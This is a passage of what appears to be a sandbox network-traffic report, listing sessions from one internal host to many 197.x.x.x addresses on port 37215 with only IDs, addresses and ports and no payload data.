                                                                            14734192.168.2.1546028197.57.15.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14735192.168.2.1539912197.206.59.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14736192.168.2.1544374197.118.243.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14737192.168.2.1549966197.46.214.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14738192.168.2.1553038197.139.86.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14739192.168.2.1534270197.82.59.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14740192.168.2.1536234197.65.54.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14741192.168.2.1557956197.135.77.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14742192.168.2.1554004197.86.31.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14743192.168.2.1537890197.124.183.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14744192.168.2.1560976197.130.192.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14745192.168.2.1541424197.124.134.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14746192.168.2.1560400197.114.118.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14747192.168.2.1547466197.155.73.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14748192.168.2.1542410197.200.110.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14749192.168.2.1540750197.149.128.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14750192.168.2.1540766197.97.121.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14751192.168.2.1537966197.14.64.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14752192.168.2.1554664197.157.184.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14753192.168.2.1558912197.54.70.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14754192.168.2.1554678197.22.113.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14755192.168.2.1548478197.181.157.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14756192.168.2.1537016197.211.222.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14757192.168.2.1553456197.190.225.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14758192.168.2.1547454197.149.111.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14759192.168.2.1534334197.144.150.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14760192.168.2.1544674197.90.171.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14761192.168.2.1552054197.119.175.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14762192.168.2.1553316197.231.71.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14763192.168.2.1552478197.128.234.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14764192.168.2.1546090197.233.164.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14765192.168.2.1542384197.170.193.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14766192.168.2.1538194197.36.168.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14767192.168.2.1535132197.242.70.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14768192.168.2.1557748197.218.152.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14769192.168.2.1536294197.7.235.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14770192.168.2.1554636197.76.218.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14771192.168.2.1554758197.216.124.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14772192.168.2.1560708197.195.222.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14773192.168.2.1551988197.37.186.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14774192.168.2.1544132197.146.188.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14775192.168.2.1538242197.163.206.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14776192.168.2.1546884197.40.195.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14777192.168.2.1535212197.86.43.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14778192.168.2.1547490197.121.164.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14779192.168.2.1538502197.221.213.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14780192.168.2.1550466197.206.153.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14781192.168.2.1547214197.2.235.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14782192.168.2.1553674197.33.213.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14783192.168.2.1552158197.70.108.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14784192.168.2.1534692197.101.251.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14785192.168.2.1543014197.234.219.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14786192.168.2.1543142197.193.133.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14787192.168.2.1533750197.174.69.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14788192.168.2.1538242197.215.32.10637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14789192.168.2.1558564197.132.246.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14790192.168.2.1533064197.57.231.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14791192.168.2.1534482197.222.7.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14792192.168.2.1558102197.112.159.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14793192.168.2.1549924197.223.141.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14794192.168.2.1557934197.231.166.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14795192.168.2.1544366197.58.91.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14796192.168.2.1537664197.109.61.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14797192.168.2.1560418197.79.24.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14798192.168.2.1536416197.243.97.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14799192.168.2.1558982197.126.155.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14800192.168.2.1534192197.243.84.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14801192.168.2.1557376197.18.126.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14802192.168.2.1553494197.156.228.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14803192.168.2.1560216197.172.222.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14804192.168.2.1540520197.183.116.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14805192.168.2.1539320197.145.123.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14806192.168.2.1542204197.219.111.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14807192.168.2.1540562197.196.186.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14808192.168.2.1535858197.184.165.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14809192.168.2.1542420197.186.0.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14810192.168.2.1539410197.53.101.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14811192.168.2.1552484197.193.238.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14812192.168.2.1539616197.136.245.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14813192.168.2.1551480197.229.248.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14814192.168.2.1554848197.89.150.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14815192.168.2.1545344197.59.219.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14816192.168.2.1553568197.118.127.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14817192.168.2.1534570197.229.146.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14818192.168.2.1549106197.146.183.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14819192.168.2.1550842197.128.146.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14820192.168.2.1541044197.197.0.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14821192.168.2.1544232197.155.91.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14822192.168.2.1546914197.11.95.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14823192.168.2.1550942197.183.7.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14824192.168.2.1549208197.111.216.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14825192.168.2.1558176197.22.184.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14826192.168.2.1555226197.54.174.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14827192.168.2.1542750197.143.37.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14828192.168.2.1553512197.154.218.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14829192.168.2.1547728197.159.33.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14830192.168.2.1550630197.195.41.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14831192.168.2.1534138197.29.178.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14832192.168.2.1557996197.112.230.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14833192.168.2.1545694197.209.158.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14834192.168.2.1558870197.192.176.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14835192.168.2.1541800197.54.226.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14836192.168.2.1536124197.183.245.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14837192.168.2.1558990197.236.153.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14838192.168.2.1541952197.192.131.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14839192.168.2.1558096197.116.102.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14840192.168.2.1534898197.195.22.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14841192.168.2.1560588197.185.84.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14842192.168.2.1560252197.108.13.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14843192.168.2.1556968197.226.183.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14844192.168.2.1542622197.199.248.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14845192.168.2.1538958197.109.169.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14846192.168.2.1545526197.27.248.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14847192.168.2.1543088197.17.215.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14848192.168.2.1537178197.76.82.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14849192.168.2.1534542197.71.247.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14850192.168.2.1542992197.201.255.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14851192.168.2.1558986197.82.1.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14852192.168.2.1560542197.84.63.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14853192.168.2.1560414197.227.138.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14854192.168.2.1550002197.61.191.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14855192.168.2.1556200197.105.146.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14856192.168.2.1558162197.104.57.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14857192.168.2.1542060197.234.115.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14858192.168.2.1541500197.211.125.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14859192.168.2.1553418197.252.31.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14860192.168.2.1554894197.53.184.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14861192.168.2.1556732197.207.140.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14862192.168.2.1550190197.126.134.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14863192.168.2.1559378197.91.91.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14864192.168.2.1541850197.129.88.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14865192.168.2.1546740197.210.94.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14866192.168.2.1554142197.9.57.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14867192.168.2.1537522197.201.44.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14868192.168.2.1549458197.96.57.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14869192.168.2.1542046197.64.213.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14870192.168.2.1546950197.151.103.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14871192.168.2.1543804197.124.245.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14872192.168.2.1533974197.156.253.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14873192.168.2.1543582197.6.229.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14874192.168.2.1535880197.163.18.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14875192.168.2.1544466197.97.73.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14876192.168.2.1560170197.2.165.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14877192.168.2.1535912197.157.155.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14878192.168.2.1552352197.33.163.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14879192.168.2.1537138197.33.98.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14880192.168.2.1543954197.22.174.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14881192.168.2.1547576197.103.54.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14882192.168.2.1555886197.158.205.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14883192.168.2.1543196197.171.196.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14884192.168.2.1548468197.106.231.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14885192.168.2.1555736197.135.252.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14886192.168.2.1550532197.227.84.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14887192.168.2.1533000197.184.110.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14888192.168.2.1540380197.3.22.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14889192.168.2.1557058197.107.209.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14890192.168.2.1547584197.146.160.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14891192.168.2.1544562197.171.234.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14892192.168.2.1547638197.216.75.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14893192.168.2.1560422197.254.96.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14894192.168.2.1551080197.176.51.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14895192.168.2.1552858197.248.176.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14896192.168.2.1559266197.207.209.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14897192.168.2.1536554197.222.173.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14898192.168.2.1554448197.252.73.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14899192.168.2.1559088197.184.132.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14900192.168.2.1541978197.39.76.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14901192.168.2.1553136197.198.174.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14902192.168.2.1536876197.28.2.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14903192.168.2.1552580197.226.33.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14904192.168.2.1536544197.68.153.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14905192.168.2.1541128197.187.147.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14906192.168.2.1535590197.80.244.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14907192.168.2.1546668197.20.7.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14908192.168.2.1555020197.248.251.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14909192.168.2.1536310197.131.162.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14910192.168.2.1548782197.13.8.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14911192.168.2.1559794197.154.41.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14912192.168.2.1557834197.24.37.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14913192.168.2.1536078197.18.14.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14914192.168.2.1549910197.56.211.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14915192.168.2.1557606197.139.146.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14916192.168.2.1557690197.162.116.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14917192.168.2.1538582197.154.253.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14918192.168.2.1534390197.39.168.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14919192.168.2.1557384197.28.9.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14920192.168.2.1546284197.71.70.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14921192.168.2.1554962197.103.165.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14922192.168.2.1541288197.88.93.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14923192.168.2.1557162197.168.46.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14924192.168.2.1537860197.45.50.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14925192.168.2.1534992197.6.150.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14926192.168.2.1559932197.67.250.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14927192.168.2.1543288197.70.198.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14928192.168.2.1541466197.149.144.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14929192.168.2.1560994197.199.250.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14930192.168.2.1559720197.200.33.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14931192.168.2.1535812197.139.95.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14932192.168.2.1536652197.28.96.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            14933192.168.2.1542686197.190.58.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
